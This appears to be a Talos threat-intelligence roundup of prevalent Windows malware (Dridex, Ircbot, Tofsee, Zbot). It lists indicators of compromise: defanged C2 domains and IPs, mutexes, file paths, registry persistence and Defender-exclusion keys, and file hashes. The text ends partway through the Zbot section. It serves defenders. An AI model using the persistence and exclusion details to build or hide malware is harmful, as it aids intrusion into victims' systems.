Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 21 and May 28. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Malware.Dridex-9863247-1 Malware Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Ircbot.Ircbot-9863290-0 Ircbot Ircbot, also known as Eldorado, is known for injecting into processes, spreading to removable media, and gaining execution via Autorun.inf files.
Win.Packed.Tofsee-9863322-1 Packed Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the size of the botnet.
Win.Packed.Zbot-9864764-0 Packed Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
Win.Packed.Razy-9863698-0 Packed Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypts the data before sending it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Packed.ZeroAccess-9863627-1 Packed ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns.
Win.Dropper.NetWire-9863651-1 Dropper NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Nymaim-9863762-0 Malware Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Trojan.Zegost-9863903-0 Trojan Zegost is a remote access trojan designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. Zegost appears to be derived from Gh0stRAT, which is a well-known remote access trojan that had its source code leaked, significantly lowering the barrier to entry for actors looking to modify and reuse the code in new attacks.

Threat Breakdown

Win.Malware.Dridex-9863247-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
MutexesOccurrences
{ac5b642b-c225-7367-a847-11bdf3a5e67c} 22
{24d07012-9955-711c-e323-1079ebcbe1f4} 22
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
74[.]125[.]4[.]217 1
Files and or directories createdOccurrences
\REGISTRY\MACHINE\SOFTWARE\Classes\AllFilesystemObjects 2
%APPDATA%\Microsoft\Windows\STARTM~1\Programs\Startup\Ymxwdsyzafokif.lnk 2
%APPDATA%\Microsoft\Windows\STARTM~1\Programs\Startup\Umxvfminqnvbr.lnk 2
%APPDATA%\Microsoft\Windows\STARTM~1\Programs\Startup\Yzhamaqvxq.lnk 2
%APPDATA%\Microsoft\Windows\STARTM~1\Programs\Startup\Fhpzkfeavtvngv.lnk 2
%APPDATA%\Adobe\Acrobat\9.0\Security\DtUO1m\DUI70.dll 1
%APPDATA%\Microsoft\Templates\LiveContent\aJPnlzFsS\XmlLite.dll 1
%APPDATA%\Adobe\Acrobat\9.0\Security\DtUO1m\phoneactivate.exe 1
%APPDATA%\Microsoft\Templates\LiveContent\aJPnlzFsS\wsqmcons.exe 1
%APPDATA%\Microsoft\Publisher Building Blocks\XO\MAGNIFICATION.dll 1
%APPDATA%\Microsoft\Publisher Building Blocks\XO\Magnify.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\sEKGfumvF\WTSAPI32.dll 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\sEKGfumvF\rdpclip.exe 1
%LOCALAPPDATA%\4jn\UxTheme.dll 1
%LOCALAPPDATA%\4jn\msdt.exe 1
%LOCALAPPDATA%\7lhz042u\BitLockerWizardElev.exe 1
%LOCALAPPDATA%\7lhz042u\FVEWIZ.dll 1
%LOCALAPPDATA%\lUO4ex2Ju\MFC42u.dll 1
%LOCALAPPDATA%\lUO4ex2Ju\eudcedit.exe 1
%APPDATA%\HNC\User\HCell\Eq\BitLockerWizardElev.exe 1
%APPDATA%\HNC\User\HCell\Eq\FVEWIZ.dll 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\v2JJQd9hJ\UxTheme.dll 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\v2JJQd9hJ\msdt.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\HaULC\MFC42u.dll 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\HaULC\eudcedit.exe 1

*See JSON for more IOCs

File Hashes

0293d23c38e9901a2bbedf86df337510d3a99dbc3c3f6a6a0dfd97c88667d2e7
06c64515324f758a02ea6724d8558d1d939736d1469fa7f0a63a7f768b8e4de7
0ebd7ed3d6ec1bdc4b7c8d900a0d8096f1aa0bfbe7543bad3ffa7da838f2fb58
12c4b2a74383e440c916025c6ffb6ad3bf17abf31be3711bba9e61979788a9d5
145b56179d29d1baabc0a3543315af87dfaad5ee0459c6d5476a8c3feacca4a1
16db042be6962f084c5aae81c1a4b157b64ac773d123c8efe43f019f6bc0067e
18514dea6e4c6b9676e40d5ea29d761d24a9a45701862da13d0d3e7731acb98d
19895dfc888e9ebc6603c0af480d06cb94bccb6945858c370ba14920cf33cb93
2b109008beaaf4425129e8dd1ae798527118515dded0c7dbd5cc31f0c6e90d10
3c5bf26a99744b30eb25f09d64396b9ae8f61284af42d7e090a8c8abf8151ad8
3da8fc54cd5d22cf3244f8197b686cf9562f1ff65c1b4a598284dde264a75af8
782b9b4f3008fbbfc41e2f92b49f17da9e15b06705a8145b9f774bfb030b41ff
83dfb136146851f9bc0aa349febc9980e865f8597ab4bf2a593bbf3e206cf15d
849de7d127c84e3d922fe097bf25293eb4b44b07177a9d02e95b8211d5c33fa5
9fb7ec52baca0a0f8d5159a14e2592f3cc9dac001cd2e627b8542b509ad1271e
a60ef86304816a8df448603ef72dd8ee627dab0e165ca89bd8754cfb4f6e381a
b34909fd14b280c420e1dee32d7ff5ee92c2cd093207a56857f8e84f231f8b73
bd86fc8ed9a8f0f134a959ad6726fca5f332734ba0e854fe59815061b07f903a
c121041c263a0e258e8fa6eddaa48608fb36caa46b3320289160231f967a3981
e4a603bef676aab17789a7a147682281a4270c09c9f1e67163085d0e40dbeef8
eb4a639bcbf014df3367c4ff2ee3dba20b92ff6268d45ce89c640970375119b4
fbdbb2d838f6c937dce9977f2a6e9aa5fc12536a188390425107587f0cd6f7ea

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK

Win.Ircbot.Ircbot-9863290-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 32 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MSN 		32
MutexesOccurrences
fghh8aeg0 12
uNk 9
<random, matching [a-zA-Z0-9]{5,9}> 8
uNke 1
Global\13e539c1-b961-11eb-b5f8-00501e3ae7b6 1
zc 1
ghuy6gh67t 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
91[.]134[.]203[.]49 3
175[.]126[.]123[.]219 1
70[.]39[.]99[.]203 1
95[.]173[.]180[.]252 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
sikwon[.]myvnc[.]com 3
sikwon[.]myvnc[.]com[.]fraud[.]noiptos[.]com 3
xrtw[.]no-ip[.]info 2
mircbot[.]no-ip[.]biz 2
unk555[.]opendns[.]be 2
hol[.]mamadody[.]mobi 2
neo12[.]cjb[.]net 1
acc7hr33[.]webhop[.]biz 1
neo12[.]xjb[.]net 1
urx[.]opendns[.]be 1
irc[.]indoirc[.]net 1
lnx[.]ekolik[.]net 1
scan[.]kizlarevi[.]net 1
king[.]noteam[.]net 1
done[.]noteam[.]net 1
n2[.]myip[.]org 1
unun[.]endofinternet[.]org 1
irc[.]superbits[.]net 1
irc[.]amcool[.]net 1
f56[.]no-ip[.]info 1
ww[.]offce[.]net 1
irc[.]bejiyan[.]com 1
irc[.]h4cky0u[.]org 1
v0ldem0rt[.]co[.]cc 1
ircftw[.]no-ip[.]info 1
Files and or directories createdOccurrences
\autorun.inf 30
E:\autorun.inf 30
E:\RECYCLER 29
\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213\Desktop.ini 28
E:\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213 28
E:\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213\Desktop.ini 28
\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213\autorunme.exe 26
E:\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213\autorunme.exe 26
%SystemRoot%\BINARy.exe 10
%SystemRoot%\wkssvr.exe 5
%SystemRoot%\dlvdr32.exe 2
%SystemRoot%\mservice.exe 2
%SystemRoot%\Ryan.exe 2
%SystemRoot%\services.exe 1
%APPDATA%\Microsoft\Protect\S-1-5-21-1160359183-2529320614-3255788068-500\Preferred 1
E:\RECYCLER\S-1-6-21-2434476511-1644491937-600003330-1213 1
E:\RECYCLER\S-1-6-21-2434476511-1644491937-600003330-1213\Desktop.ini 1
E:\RECYCLER\S-1-6-21-2434476511-1644491937-600003330-1213\autorunme.exe 1
\RECYCLER\S-1-6-21-2434476511-1644491937-600003330-1213\Desktop.ini 1
\RECYCLER\S-1-6-21-2434476511-1644491937-600003330-1213\autorunme.exe 1
%SystemRoot%\t07a.exe 1
%SystemRoot%\sbservices.exe 1
E:\RECYCLERe 1
E:\RECYCLERe\S-1-6-21-2434476501-1644491937-600003330-1213 1
E:\RECYCLERe\S-1-6-21-2434476501-1644491937-600003330-1213\Desktope.ini 1

*See JSON for more IOCs

File Hashes

0662a151484e23e3502e27fa125e86e556b2b86e5ac119694afc86527ea4f2a3
0f47662913b1a245dbbbfac24dac42f39e9dafa76343756a2ac85b9c7c5db959
197dac0016af50a9ef8a87cb0984ac1c6f5fa903aa9e02d7d6ddf8ae976ac32a
2848d083d621c03b9049e3d7152c9cc90673db132907ffdc311385c69599de28
2cd76611b1149737868da34ef6a5442d6ea78547ded62a86f8d3d1671e1ee4c6
2e9607fe0ead28fef7e612a481dcc5d41a050d9ceab9923142c4a22243256400
45be685bcc6eb23404a2e355863c543470d981e48f22ef75ef618c2219f9883c
462410a46ba359b9280b2cd9e3b4f75137e8eab985aa8c2da3c1be5ad7d305d1
4b7e81eeb20106d3eb9ace3a42f985ed723b4ec0caaf868972766d4a22d5362e
4cb22bff03c5d3e5a3bccdba118565b0858c8c772d9b381a0459b58a79ca6b9f
51981b59b1a0907dbab915f25e6bd4ff821ab9b522287f1c93850c1c3b6aebeb
536286a43d91f7b14de5add63620448c145fb8ac09737231cf7d74308d3124b2
5e670d14f7d242049e3c6d14002f292e2914bbc89e7c9e79504474a43230a164
73abb8266fac04b012196f28c46d79e34617221c182fd3e62e63b381f6087736
74fc995446a933a8d1d8141cc63ed211d9a7e6c4457f0e152f23174591f76d05
7e5b7e48413de267d2803376b905e86eb3fdf50476332817f36ebb543089f079
7e65e32955fbb5cef8e599d776e599358a9532b135fcac7c1b5947c0771e92b8
84d2740743dda667f89c0f15539831f9f1b3484393d38a0b39f869f148348c70
8c722341a8047c9ca7130bcb6051373d667d43b252e677e1e180dede1ab63187
8dc36b6898ae88d3b23e76da866064a25b940daf5127a141a4013922e766ceb2
8ee40682d7944e85dd4d7b1c27fb6cdfe3a4aa42f74ec5c99385de92a2ab0b01
9c25f3c8ecd965c3ab134addb71fab0fbb6e2d39a331e310360736ca38b98ea2
a298fa14e2d856a55da208dadadff93fa7798115529b757b9fd34877e01053f4
a865e033c45e62c3ca125ad6ecdb7295bc6c47ea8f3df17d2264afc2b087cdf4
b3c8e7db45a86ee5dc5e06dbfbfe0484ad216574ca2c70cdd5fe02ab5184859f

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK

Win.Packed.Tofsee-9863322-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 35 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type 		35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start 		35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl 		35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName 		35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64 		35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName 		35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description 		35
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 35
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2 		35
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0 		35
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1 		35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath 		20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\kdrxwekz 		4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\wpdjiqwl 		3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\unbhgouj 		2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\haoutbhw 		2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nguazhnc 		2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\athnmuap 		2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zsgmltzo 		2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\buionvbq 		2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\lesyxfla 		2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg 		2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\mftzygmb 		2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ohvbaiod 		2
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
43[.]231[.]4[.]7 35
217[.]172[.]179[.]54 35
144[.]76[.]108[.]82 35
212[.]22[.]87[.]191 35
51[.]178[.]207[.]67 35
195[.]242[.]110[.]99 35
87[.]251[.]71[.]150 35
91[.]203[.]5[.]144 35
23[.]64[.]99[.]87 28
31[.]13[.]65[.]174 27
172[.]217[.]165[.]132 27
98[.]136[.]96[.]74 26
67[.]195[.]204[.]72 25
37[.]1[.]217[.]172 23
67[.]195[.]228[.]106 22
172[.]217[.]12[.]131 20
23[.]5[.]227[.]69 20
23[.]3[.]112[.]125 15
211[.]231[.]108[.]46/31 14
163[.]172[.]32[.]74 14
162[.]159[.]129[.]87 12
211[.]231[.]108[.]175 10
13[.]107[.]21[.]200 9
40[.]76[.]4[.]15 9
87[.]250[.]250[.]91 9

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 35
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 35
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 35
249[.]5[.]55[.]69[.]in-addr[.]arpa 35
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 35
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 35
microsoft-com[.]mail[.]protection[.]outlook[.]com 35
microsoft[.]com 35
www[.]google[.]com 35
mds[.]np[.]ac[.]playstation[.]net 28
www[.]instagram[.]com 27
work[.]a-poster[.]info 23
ip9100-npia00031-00[.]auth[.]np[.]ac[.]playstation[.]net 20
234[.]172[.]168[.]18[.]in-addr[.]arpa 20
onlinelibrary[.]wiley[.]com 19
178[.]79[.]134[.]18[.]in-addr[.]arpa 19
www[.]google[.]ch 17
yabs[.]yandex[.]ru 17
www[.]bing[.]com 15
ieeexplore[.]ieee[.]org 15
doi[.]org 14
ip[.]pr-cy[.]hacklix[.]com 14
accounts[.]snapchat[.]com 10
aip[.]scitation[.]org 9
auth[.]netcombo[.]com[.]br 9

*See JSON for more IOCs

Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile 35
%SystemRoot%\SysWOW64\config\systemprofile:.repos 35
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 35
%TEMP%\<random, matching '[a-z]{8}'>.exe 33
%System32%\config\systemprofile:.repos 25
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 25
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 8

File Hashes

03bf51ad3772d5112fb947b1f29b64ff51e32276d90d3f78cb90b806e94053d3
0716126ad32a803b7fe29cc37b98d17a44383639ea68f7c158bb126bb8627d52
07829b22c465db6169a9aedd4893a1293958b531324e7d07d58c79f45a191fa6
07d35be60899667b6d6a6feff4aae02bd5c32f04dd575129eb2e2052c19fb65b
0f56858f59bcf17f29f2794fe9b2f56ffc26b86fbdd4e71ba49d104df4b03eb4
16480932cf9245a0190e7dad71b7f7ba7cd6fa93408e2fa153517be03fe2263e
167ab13c7268284e178eb0f8795d9fad2c3fbc0f4db7337ca992ae37416caa9a
1696e24a37ee049c018e9f59f1a6709cdf771f963734ea0ec84f79ee9896d4ea
1db80acb27bce7a6870c7f577b00b5ad340c19de68fa8a079e712f63978ca21a
2e83d27edf0120cf61d65363b7e2553f6aa997357c95af565c9bdc781a28e311
475905548edcc86b9d77b970638536160bde59f00adb0e1ce10016ac5038e37b
4c5f7da67235babd13f5633a7409c883847341abc378119bc7edfcc87a254062
4f2d934d6612f35256fef43474e21ed17cd1d3c8ac681bf1c4c619aa3101b867
576d3edc6414415ece7f6b6f6e4941cf07f351738c850cbc4eb3e74ab860977c
5d66b57226cd12144066a94d6c0649b8fb175bc12413f0d974544bf48f0c3d11
675ca50c7469575146ea2e08c5194e33a65b5b34cec39f04b8d4374166addf3b
93874e6510cf50476f20cbfb063a60e04c7b6e999be3406ae34ab1b9f280f204
943804a14e9e568146d1526664d7d4f9a1c92b2b97742c5990131af510e8089a
9a1c784b1bb4eee3e7e611e5239c9a955f0f3008c0f8243697bf1c19a785ceff
aa6a6e33d48e788ed019933b3c520423a143b45b94b7711f29fb6074513e0c79
ab4bec1b414a89480cec2986fe1962dae17294be0adf757bf00d0b0441d44fd6
abbcfa13d08725001ca9bddd1830d7b72cd3b26df6f07d755be681b7a68ba37a
ac2d2ce112c49c1e03f49eb172316976568ad9596331e85bd93c6b95075a7221
b72d17a02d2e88ccfd6c282bf98858ca5697a2fe498f2ff7e47a8617ab13b555
c32a4803174aa55985ecc45389e875b29b4f4451578f4675796cc3725ec93435

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK

Win.Packed.Zbot-9864764-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mssend 		9
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies 		2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting 		2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting 		2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting 		2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting 		2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting 		2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Users\Administrator\AppData\Roaming\xrc3u3qyysxakx1bdrcfxnbvxqxzzzhi2\svcnost.exe 		1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Users\Administrator\AppData\Roaming\xipfdhpxs2y1uidtt2cf1dp1nsxhfhzv2\svcnost.exe 		1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {45EBDE09-B8AE-3DDD-DDFF-11B333B2A8E0} 		1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {900ABDDA-74EE-F199-7D2F-060E7E8C2398} 		1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Users\Administrator\AppData\Roaming\x1vkixykjptuvcan2w3kxcmncbdke2up2\svcnost.exe 		1
<HKCU>\SOFTWARE\MICROSOFT\FEDUO
Value Name: Mykefat 		1
<HKCU>\SOFTWARE\MICROSOFT\OCLU
Value Name: Evsauc 		1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Users\Administrator\AppData\Roaming\x1tj3icmbo33xthrtlk2bschp2skmlsa2\svcnost.exe 		1
<HKCU>\SOFTWARE\MICROSOFT\FEDUO 1
<HKCU>\SOFTWARE\MICROSOFT\OCLU 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Users\Administrator\AppData\Roaming\xbzmfecljkddemubtibatcqva3rwrkya2\svcnost.exe 		1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Users\Administrator\AppData\Roaming\xeelzmrnnktfqyecuwakgjpxewhhvob32\svcnost.exe 		1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Users\Administrator\AppData\Roaming\xdcjvf3kdsd3rjmtr2ebmtycyshibawe2\svcnost.exe 		1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Users\Administrator\AppData\Roaming\x2ipsjhqzrqeslkuo1nvhob3hhrpkrez2\svcnost.exe 		1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Users\Administrator\AppData\Roaming\xoeexpxwjohheodlyfxud2d12wc32usz2\svcnost.exe 		1
MutexesOccurrences
GLOBAL\{<random GUID>} 2
Local\{<random GUID>} 2
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
212[.]95[.]32[.]68 5
173[.]224[.]125[.]54 3
172[.]217[.]165[.]132 2
217[.]20[.]127[.]169 1
217[.]20[.]112[.]31 1
217[.]20[.]115[.]138 1
217[.]20[.]115[.]192 1
89[.]149[.]242[.]11 1
89[.]149[.]242[.]31 1
89[.]149[.]244[.]18 1
89[.]149[.]244[.]131 1
89[.]149[.]243[.]82 1
217[.]20[.]127[.]170 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
frigw[.]ru 5
habew[.]ru 5
qlita[.]ru 3
qimpa[.]ru 3
www[.]google[.]com 2
fallb[.]ru 1
orthb[.]ru 1
qjhhgpcrufowipvz[.]biz 1
nnuozosighewmigq[.]biz 1
qjhhgpcrufowipvz[.]org 1
nnuozosighewmigq[.]org 1
kgiqlnknpzqutjs[.]info 1
psosfmhfomti[.]info 1
kgiqlnknpzqutjs[.]com 1
psosfmhfomti[.]com 1
oloynepoursmptli[.]org 1
twotmeegloxrmv[.]org 1
oloynepoursmptli[.]biz 1
twotmeegloxrmv[.]biz 1
aemunkxyjmrznrls[.]info 1
mqlmrqihmrpnjtqm[.]info 1
aemunkxyjmrznrls[.]org 1
mqlmrqihmrpnjtqm[.]org 1
qolppnsimtsypr[.]net 1
fpuculxcpuqjtwn[.]net 1

*See JSON for more IOCs

Files and or directories createdOccurrences
%APPDATA%\ntuser.dat 9
%APPDATA%\xrc3u3qyysxakx1bdrcfxnbvxqxzzzhi 1
%APPDATA%\xipfdhpxs2y1uidtt2cf1dp1nsxhfhzv 1
%APPDATA%\Uwibuw\uvwij.ecd 1
%APPDATA%\x1vkixykjptuvcan2w3kxcmncbdke2up 1
%APPDATA%\Inac\ecny.mur 1
%TEMP%\tmp908c9f54.bat 1
%APPDATA%\Ikjeva 1
%TEMP%\tmp296bf3d2.bat 1
%APPDATA%\Ikjeva\iruj.exe 1
%APPDATA%\x1tj3icmbo33xthrtlk2bschp2skmlsa 1
%APPDATA%\Inac 1
%APPDATA%\Uwibuw 1
%APPDATA%\Qeynre 1
%APPDATA%\Qeynre\jeuz.exe 1
%APPDATA%\xbzmfecljkddemubtibatcqva3rwrkya 1
%APPDATA%\xeelzmrnnktfqyecuwakgjpxewhhvob3 1
%APPDATA%\xdcjvf3kdsd3rjmtr2ebmtycyshibawe 1
%APPDATA%\x2ipsjhqzrqeslkuo1nvhob3hhrpkrez 1
%APPDATA%\xoeexpxwjohheodlyfxud2d12wc32usz 1

File Hashes

13a2a31a42daeb9b09a2128e3c0bc505c2f8d1a93ffebcfd1ef1f4d78061ec86
1d7bd3fecffc0da4436229a6627256e72964a67aa03a67fdbbeb106227a8d3c5
3a8cbcad968f65f54d8cadf89570f5501a30f19b49282b963bbb9e38d1569a23
588bcacd0c0c7c421fcf635e897d37fb5003a5585e3746e5e1c87d90e4197350
9f5f5773423831e0f6ef1e256fc0b9950be64ce8a76924c8033df1c1b8f35943
a5f70e50ca92efdc108805056d5566ba53896181f3d064ab82d6d6c963d933cb
